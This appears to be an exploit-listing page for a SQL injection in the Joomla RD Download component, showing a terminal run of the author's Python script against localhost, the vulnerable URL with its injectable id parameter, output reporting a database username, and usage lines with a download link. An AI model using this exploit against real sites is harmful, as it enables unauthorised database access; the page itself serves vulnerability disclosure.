claudio@backbox3:~$ python j00m_com_rd_download_sql_injection.py -t http://127.0.0.1
_______ __
| _ .-----.-----.--------| .---.-.
|___| | _ | _ | | | _ |
|. | |_____|_____|__|__|__|__|___._|
|: 1 |
|::.. . |
`-------'
_______ ______ ______ __ __
| _ | _ \ | _ \ .-----.--.--.--.-----| .-----.---.-.--| |
|. l |. | \ |. | \| _ | | | | | | _ | _ | _ |
|. _ |. | \ |. | |_____|________|__|__|__|_____|___._|_____|
|: | |: 1 / |: 1 /
|::.|:. |::.. . / |::.. . /
`--- ---`------' `------'
J00ml4 RD D0wnl04d Sql1nj3ct10n
Written by:
Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
[*] Trying to connect to: http://127.0.0.1/index.php?option=com_rd_download&view=download&task=dl&id=[SQLi]
[!] VULNERABLE
[*] Username: j00mUser@%
claudio@backbox3:~$
Info
# Exploit Name: Joomla RD Download SQL Injection
#
# Version: Unknown
Download
Download Exploit: HERE
Exploit Usage
claudio@backbox3:~$ python j00m_com_rd_download_sql_injection.py -t http[s]://localhost[:PORT]
or
claudio@backbox3:~$ python j00m_com_rd_download_sql_injection.py -t http[s]://localhost[:PORT]/basedir